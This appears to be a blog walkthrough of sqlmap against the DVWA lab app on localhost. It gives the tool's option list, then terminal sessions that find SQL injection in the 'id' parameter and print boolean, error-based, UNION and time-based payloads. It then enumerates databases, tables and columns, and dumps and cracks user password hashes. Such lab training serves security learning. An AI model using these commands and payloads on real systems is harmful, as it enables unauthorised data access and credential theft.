sqlmap/1.0-dev (r4009) - automatic SQL
injection and database takeover tool
http://sqlmap.sourceforge.net
Usage:
python ./sqlmap.py [options]
Options:
--version show program's version number and
exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be
specified to set the source to
get target urls from.
-d DIRECT Direct connection to the database
-u URL, --url=URL Target url
-l LOGFILE Parse targets from Burp or WebScarab
proxy logs
-m BULKFILE Scan multiple targets enlisted in a
given textual file
-r REQUESTFILE Load HTTP request from a file
-g GOOGLEDORK Process Google dork results as target
urls
-c CONFIGFILE Load options from a configuration INI
file
Request:
These options can be used to specify how to
connect to the target url.
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
--cookie-urlencode URL Encode generated cookie injections
--drop-set-cookie Ignore Set-Cookie header from response
--user-agent=AGENT HTTP User-Agent header
--random-agent Use randomly selected HTTP User-Agent
header
--referer=REFERER HTTP Referer header
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP authentication type (Basic, Digest or
NTLM)
--auth-cred=ACRED HTTP authentication credentials
(name:password)
--auth-cert=ACERT HTTP authentication certificate
(key_file,cert_file)
--proxy=PROXY Use a HTTP proxy to connect to the
target url
--proxy-cred=PCRED HTTP proxy authentication credentials
(name:password)
--ignore-proxy Ignore system default HTTP proxy
--delay=DELAY Delay in seconds between each HTTP
request
--timeout=TIMEOUT Seconds to wait before timeout connection
(default 30)
--retries=RETRIES Retries when the connection timeouts
(default 3)
--scope=SCOPE Regexp to filter targets from provided
proxy log
--safe-url=SAFURL Url address to visit frequently during
testing
--safe-freq=SAFREQ Test requests between two visits to a given
safe url
Optimization:
These options can be used to optimize the
performance of sqlmap.
-o Turn on all optimization
switches
--predict-output Predict common queries output
--keep-alive Use persistent HTTP(s) connections
--null-connection Retrieve page length without actual HTTP
response body
--threads=THREADS Max number of concurrent HTTP(s) requests
(default 1)
Injection:
These options can be used to specify which
parameters to test for,
provide custom injection payloads and
optional tampering scripts.
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to this value
--os=OS Force back-end DBMS operating
system to this value
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering
injection data
Detection:
These options can be used to specify how to
parse and compare page
content from HTTP responses when using
blind SQL injection technique.
--level=LEVEL Level of tests to perform (1-5, default
1)
--risk=RISK Risk of tests to perform (0-3, default
1)
--string=STRING String to match in page when the query is
valid
--regexp=REGEXP Regexp to match in page when the query is
valid
--text-only Compare pages based only on the
textual content
Techniques:
These options can be used to tweak testing
of specific SQL injection
techniques.
--technique=TECH SQL injection techniques to test for
(default BEUST)
--time-sec=TIMESEC Seconds to delay the DBMS response (default
5)
--union-cols=UCOLS Range of columns to test for UNION query SQL
injection
--union-char=UCHAR Character to use for bruteforcing number of
columns
Fingerprint:
-f, --fingerprint Perform an extensive DBMS version
fingerprint
Enumeration:
These options can be used to enumerate the
back-end database
management system information, structure
and data contained in the
tables. Moreover you can run your own SQL
statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is
DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table
columns
--schema Enumerate DBMS schema
--count Retrieve number of entries for
table(s)
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables
entries
--search Search column(s), table(s) and/or
database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to
enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when
enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to
retrieve
--last=LASTCHAR Last query output word character to
retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
Brute force:
These options can be used to run brute
force checks.
--common-tables Check existence of common tables
--common-columns Check existence of common columns
User-defined function injection:
These options can be used to create custom
user-defined functions.
--udf-inject Inject custom user-defined functions
--shared-lib=SHLIB Local path of the shared library
File system access:
These options can be used to access the
back-end database management
system underlying file system.
--file-read=RFILE Read a file from the back-end DBMS file
system
--file-write=WFILE Write a local file on the back-end DBMS file
system
--file-dest=DFILE Back-end DBMS absolute filepath to write to
Operating system access:
These options can be used to access the
back-end database management
system underlying operating system.
--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating
system shell
--os-pwn Prompt for an out-of-band shell,
meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell,
meterpreter or VNC
--os-bof Stored procedure buffer overflow
exploitation
--priv-esc Database process' user privilege
escalation
--msf-path=MSFPATH Local path where Metasploit Framework 3 is
installed
--tmp-path=TMPPATH Remote absolute path of temporary files
directory
Windows registry access:
These options can be used to access the
back-end database management
system Windows registry.
--reg-read Read a Windows registry key value
--reg-add Write a Windows registry key value
data
--reg-del Delete a Windows registry key value
--reg-key=REGKEY Windows registry key
--reg-value=REGVAL Windows registry key value
--reg-data=REGDATA Windows registry key value data
--reg-type=REGTYPE Windows registry key value type
General:
These options can be used to set some
general working parameters.
-s SESSIONFILE Save and resume all data retrieved on a
session file
-t TRAFFICFILE Log all HTTP traffic into a textual file
--batch Never ask for user input, use the
default behaviour
--charset=CHARSET Force character encoding used for data
retrieval
--eta Display for each output the
estimated time of arrival
--flush-session Flush session file for current target
--fresh-queries Ignores query results stored in session
file
--save Save options on a configuration
INI file
--update Update sqlmap
Miscellaneous:
--beep Alert when sql injection found
--check-payload IDS detection testing of injection
payloads
--cleanup Clean up the DBMS by sqlmap specific
UDF and tables
--forms Parse and test forms on target url
--gpage=GOOGLEPAGE Use Google dork results from specified page
number
--mobile Imitate smartphone through HTTP
User-Agent header
--page-rank Display page rank (PR) for Google dork
results
--parse-errors Parse DBMS error messages from response
pages
--replicate Replicate dumped data into a sqlite3
database
--tor Use default Tor
(Vidalia/Privoxy/Polipo) proxy address
--wizard Simple wizard interface for
beginner users
root@bt:/pentest/database/sqlmap#
python sqlmap.py -u http://localhost/index.php?id=2 --dbs
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="Cookie=security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2;
PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic SQL
injection and database takeover tool
http://sqlmap.sourceforge.net
[*]
starting at: 01:45:28
[01:45:28]
[INFO] using '/pentest/database/sqlmap/output/localhost/session' as session
file
[01:45:28]
[INFO] testing connection to the target url
[01:45:28]
[INFO] testing if the provided string is within the target URL page content
you
provided an HTTP Cookie header value. The target url provided its own Cookie
within the HTTP Set-Cookie header. Do you want to continue using the HTTP
Cookie values that you provided? [Y/n] y
[01:45:30]
[INFO] testing if GET parameter 'id' is dynamic
[01:45:30]
[INFO] confirming that GET parameter 'id' is dynamic
[01:45:31]
[INFO] GET parameter 'id' is dynamic
[01:45:31]
[WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[01:45:31]
[INFO] testing sql injection on GET parameter 'id'
[01:45:31]
[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:45:31]
[INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:45:31]
[INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:45:31]
[INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause'
[01:45:31]
[INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:45:31]
[INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:45:31]
[INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:45:31]
[INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:45:31]
[INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:45:31]
[INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:45:31]
[INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:45:31]
[INFO] testing 'Oracle AND time-based blind'
[01:45:31]
[INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:45:32]
[INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:45:32]
[WARNING] using unescaped version of the test because of zero knowledge of the
back-end DBMS
[01:45:33]
[WARNING] GET parameter 'id' is not injectable
[01:45:33]
[INFO] testing if GET parameter 'Submit' is dynamic
[01:45:33]
[WARNING] GET parameter 'Submit' appears to be not dynamic
[01:45:33]
[WARNING] heuristic test shows that GET parameter 'Submit' might not be
injectable
[01:45:33]
[INFO] testing sql injection on GET parameter 'Submit'
[01:45:33]
[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:45:33]
[INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:45:33]
[INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:45:33]
[INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause'
[01:45:33]
[INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:45:33]
[INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:45:33]
[INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:45:34]
[INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:45:34]
[INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:45:34]
[INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:45:34]
[INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:45:34]
[INFO] testing 'Oracle AND time-based blind'
[01:45:34]
[INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:45:35]
[INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:45:35]
[WARNING] GET parameter 'Submit' is not injectable
[01:45:35]
[CRITICAL] all parameters appear to be not injectable. Try to increase
--level/--risk values to perform more tests. Rerun by providing a valid
--string, perhaps the string that you have choosen does not match only on True
responses
[*]
shutting down at: 01:45:35
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u
"http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="=security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2;
PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic SQL
injection and database takeover tool
http://sqlmap.sourceforge.net
[*]
starting at: 01:46:10
[01:46:10]
[INFO] using '/pentest/database/sqlmap/output/localhost/session' as session
file
[01:46:10]
[INFO] testing connection to the target url
[01:46:10]
[INFO] testing if the provided string is within the target URL page content
you
provided an HTTP Cookie header value. The target url provided its own Cookie
within the HTTP Set-Cookie header. Do you want to continue using the HTTP
Cookie values that you provided? [Y/n] y
[01:46:13]
[INFO] testing if GET parameter 'id' is dynamic
[01:46:13]
[INFO] confirming that GET parameter 'id' is dynamic
[01:46:13]
[INFO] GET parameter 'id' is dynamic
[01:46:13]
[WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[01:46:13]
[INFO] testing sql injection on GET parameter 'id'
[01:46:13]
[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:13]
[INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:13]
[INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:46:14]
[INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause'
[01:46:14]
[INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:46:14]
[INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:14]
[INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:46:14]
[INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:46:14]
[INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:14]
[INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:46:14]
[INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:46:14]
[INFO] testing 'Oracle AND time-based blind'
[01:46:14]
[INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:15]
[INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:15]
[WARNING] using unescaped version of the test because of zero knowledge of the
back-end DBMS
[01:46:16]
[WARNING] GET parameter 'id' is not injectable
[01:46:16]
[INFO] testing if GET parameter 'Submit' is dynamic
[01:46:16]
[WARNING] GET parameter 'Submit' appears to be not dynamic
[01:46:16]
[WARNING] heuristic test shows that GET parameter 'Submit' might not be
injectable
[01:46:16]
[INFO] testing sql injection on GET parameter 'Submit'
[01:46:16]
[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:16]
[INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:16]
[INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:46:16]
[INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause'
[01:46:16]
[INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:46:16]
[INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:16]
[INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:46:16]
[INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:46:16]
[INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:16]
[INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:46:16]
[INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:46:17]
[INFO] testing 'Oracle AND time-based blind'
[01:46:17]
[INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:17]
[INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:18]
[WARNING] GET parameter 'Submit' is not injectable
[01:46:18]
[CRITICAL] all parameters appear to be not injectable. Try to increase
--level/--risk values to perform more tests. Rerun by providing a valid
--string, perhaps the string that you have choosen does not match only on True
responses
[*]
shutting down at: 01:46:18
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u
"http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2;
PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic SQL
injection and database takeover tool
http://sqlmap.sourceforge.net
[*]
starting at: 01:46:31
[01:46:31]
[INFO] using '/pentest/database/sqlmap/output/localhost/session' as session
file
[01:46:31]
[INFO] testing connection to the target url
[01:46:31]
[INFO] testing if the provided string is within the target URL page content
[01:46:31]
[INFO] testing if GET parameter 'id' is dynamic
[01:46:31]
[INFO] confirming that GET parameter 'id' is dynamic
[01:46:31]
[INFO] GET parameter 'id' is dynamic
[01:46:32]
[INFO] heuristics detected web page charset 'ascii'
[01:46:32]
[INFO] heuristic test shows that GET parameter 'id' might be injectable
(possible DBMS: MySQL)
[01:46:32]
[INFO] testing sql injection on GET parameter 'id'
[01:46:32]
[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:32]
[INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause'
injectable
[01:46:32]
[INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:32]
[INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING
clause' injectable
[01:46:32]
[INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:32]
[INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:42]
[INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind'
injectable
[01:46:42]
[INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:42]
[INFO] target url appears to be UNION injectable with 2 columns
[01:46:42]
[INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns'
injectable
GET
parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
[01:46:45]
[INFO] testing if GET parameter 'Submit' is dynamic
[01:46:45]
[WARNING] GET parameter 'Submit' appears to be not dynamic
[01:46:45]
[WARNING] heuristic test shows that GET parameter 'Submit' might not be
injectable
[01:46:45]
[INFO] testing sql injection on GET parameter 'Submit'
[01:46:45]
[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:45]
[INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:46]
[INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:46]
[INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed
error message(s) showed that the back-end DBMS could be MySQL. Do you want to
skip test payloads specific for other DBMSes? [Y/n] y
[01:46:48]
[INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:49]
[INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:49]
[WARNING] GET parameter 'Submit' is not injectable
sqlmap
identified the following injection points with a total of 133 HTTP(s) requests:
---
Place: GET
Parameter:
id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or
HAVING clause
Payload: id=1' AND 9643=9643 AND
'KTii'='KTii&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based -
WHERE or HAVING clause
Payload: id=1' AND (SELECT 8718 FROM(SELECT
COUNT(*),CONCAT(CHAR(58,112,120,122,58),(SELECT (CASE WHEN (8718=8718) THEN 1
ELSE 0 END)),CHAR(58,107,121,122,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sDog'='sDog&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10
columns
Payload: id=1' UNION ALL SELECT NULL,
CONCAT(CHAR(58,112,120,122,58),IFNULL(CAST(CHAR(71,112,86,100,86,119,116,88,106,73)
AS CHAR),CHAR(32)),CHAR(58,107,121,122,58))# AND 'OaVB'='OaVB&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based
blind
Payload: id=1' AND SLEEP(5) AND
'nCjY'='nCjY&Submit=Submit
---
[01:46:49]
[INFO] manual usage of GET payloads requires url encoding
[01:46:49]
[INFO] the back-end DBMS is MySQL
web
server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web
application technology: PHP 5.3.2, Apache 2.2.14
back-end
DBMS: MySQL 5.0
[01:46:49]
[INFO] fetching database names
available
databases [4]:
[*] dvwa
[*] fbip
[*]
information_schema
[*]
mysql
[01:46:50]
[INFO] Fetched data logged to text files under
'/pentest/database/sqlmap/output/localhost'
[*]
shutting down at: 01:46:50
Scan
DataBase in folder DVWA
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u
"http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa
--tables
sqlmap/1.0-dev
(r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*]
starting at: 01:46:50
[01:46:50]
[INFO] using '/pentest/database/sqlmap/output/localhost/session' as session
file
[01:46:50]
[INFO] resuming injection data from session file
[01:46:50]
[INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:50]
[INFO] testing connection to the target url
sqlmap
identified the following injection points with a total of 0 HTTP(s) requests:
---
Place:
GET
Parameter:
id
Type:
boolean-based blind
Title:
AND boolean-based blind - WHERE or HAVING clause
Payload:
id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit
Type:
error-based
Title: MySQL
>= 5.0 AND error-based - WHERE or HAVING clause
Payload:
id=1' AND (SELECT 7854 FROM(SELECT
COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1
ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'QJaM'='QJaM&Submit=Submit
Type:
UNION query
Title:
MySQL UNION query (NULL) - 1 to 10 columns
Payload:
id=1' UNION ALL SELECT
CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86)
AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND
'vSNt'='vSNt&Submit=Submit
Type:
AND/OR time-based blind
Title:
MySQL > 5.0.11 AND time-based blind
Payload:
id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[01:46:50]
[INFO] manual usage of GET payloads requires url encoding
[01:46:50]
[INFO] the back-end DBMS is MySQL
web
server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web
application technology: PHP 5.3.2, Apache 2.2.14
back-end
DBMS: MySQL 5.0
[01:46:50]
[INFO] fetching tables for database: dvwa
Database:
dvwa
[2
tables]
+-----------+
|
guestbook |
| users
|
+-----------+
[01:46:50]
[INFO] Fetched data logged to text files under
'/pentest/database/sqlmap/output/localhost'
[*]
shutting down at: 00:42:45
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u
"http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa
-T users --columns
sqlmap/1.0-dev
(r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*]
starting at: 01:46:51
[01:46:51]
[INFO] using '/pentest/database/sqlmap/output/localhost/session' as session
file
[01:46:51]
[INFO] resuming injection data from session file
[01:46:51]
[INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:51]
[INFO] testing connection to the target url
sqlmap
identified the following injection points with a total of 0 HTTP(s) requests:
---
Place:
GET
Parameter:
id
Type:
boolean-based blind
Title:
AND boolean-based blind - WHERE or HAVING clause
Payload:
id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit
Type:
error-based
Title:
MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload:
id=1' AND (SELECT 7854 FROM(SELECT
COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1
ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit
Type:
UNION query
Title:
MySQL UNION query (NULL) - 1 to 10 columns
Payload:
id=1' UNION ALL SELECT
CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86)
AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit
Type:
AND/OR time-based blind
Title:
MySQL > 5.0.11 AND time-based blind
Payload:
id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[00:44:35]
[INFO] manual usage of GET payloads requires url encoding
[00:44:35]
[INFO] the back-end DBMS is MySQL
web
server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web
application technology: PHP 5.3.2, Apache 2.2.14
back-end
DBMS: MySQL 5.0
[00:44:35]
[INFO] fetching columns for table 'users' on database 'dvwa'
Database:
dvwa
Table:
users
[6
columns]
+------------+-------------+
| Column
| Type |
+------------+-------------+
|
first_name | varchar(15) |
|
last_name | varchar(15) |
|
password | varchar(32) |
| user |
varchar(15) |
|
user_id | int(6) |
+------------+-------------+
[00:44:35]
[INFO] Fetched data logged to text files under
'/pentest/database/sqlmap/output/localhost'
[*]
shutting down at: 01:46:53
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
--cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa
-T users -C password --dump
sqlmap/1.0-dev
(r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*]
starting at: 01:46:53
[01:46:53
[INFO] using '/pentest/database/sqlmap/output/localhost/session' as session
file
[01:46:53]
[INFO] resuming injection data from session file
[01:46:53]
[INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:53]
[INFO] testing connection to the target url
sqlmap
identified the following injection points with a total of 0 HTTP(s) requests:
---
Place:
GET
Parameter:
id
Type:
boolean-based blind
Title:
AND boolean-based blind - WHERE or HAVING clause
Payload:
id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit
Type:
error-based
Title:
MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload:
id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT
(CASE WHEN (7854=7854) THEN 1 ELSE 0
END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'QJaM'='QJaM&Submit=Submit
Type:
UNION query
Title:
MySQL UNION query (NULL) - 1 to 10 columns
Payload:
id=1' UNION ALL SELECT
CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86)
AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND
'vSNt'='vSNt&Submit=Submit
Type:
AND/OR time-based blind
Title:
MySQL > 5.0.11 AND time-based blind
Payload:
id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[01:46:53]
[INFO] manual usage of GET payloads requires url encoding
[01:46:53]
[INFO] the back-end DBMS is MySQL
web
server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web
application technology: PHP 5.3.2, Apache 2.2.14
back-end
DBMS: MySQL 5.0
do you
want to use LIKE operator to retrieve column names similar to the ones provided
with the -C option? [Y/n] y
[01:46:54]
[INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[01:46:54]
[INFO] fetching column(s) 'password' entries for table 'users' on database
'dvwa'
recognized
possible password hash values. do you want to use dictionary attack on
retrieved table items? [Y/n/q] y
[01:46:55]
[INFO] using hash method: 'md5_generic_passwd'
what's
the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[01:46:58]
[INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you
want to use common password suffixes? (slow!) [y/N] y
[01:46:58]
[INFO] starting dictionary attack (md5_generic_passwd)
[01:46:58]
[INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[01:46:58]
[INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[01:46:58]
[INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[01:46:58]
[INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database:
dvwa
Table:
users
[4
entries]
+---------------------------------------------+
|
password |
+---------------------------------------------+
|
0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
|
8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
|
e99a18c428cb38d5f260853678922e03 (abc123) |
|
5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+
[01:46:58]
[INFO] Table 'dvwa.users' dumped to CSV file
'/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[01:46:58]
[INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
nice article, so i want learn from you, can i?
BalasHapusbecause I'm just learning and do not quite understand, how if we learn together?
HapusDo you agree?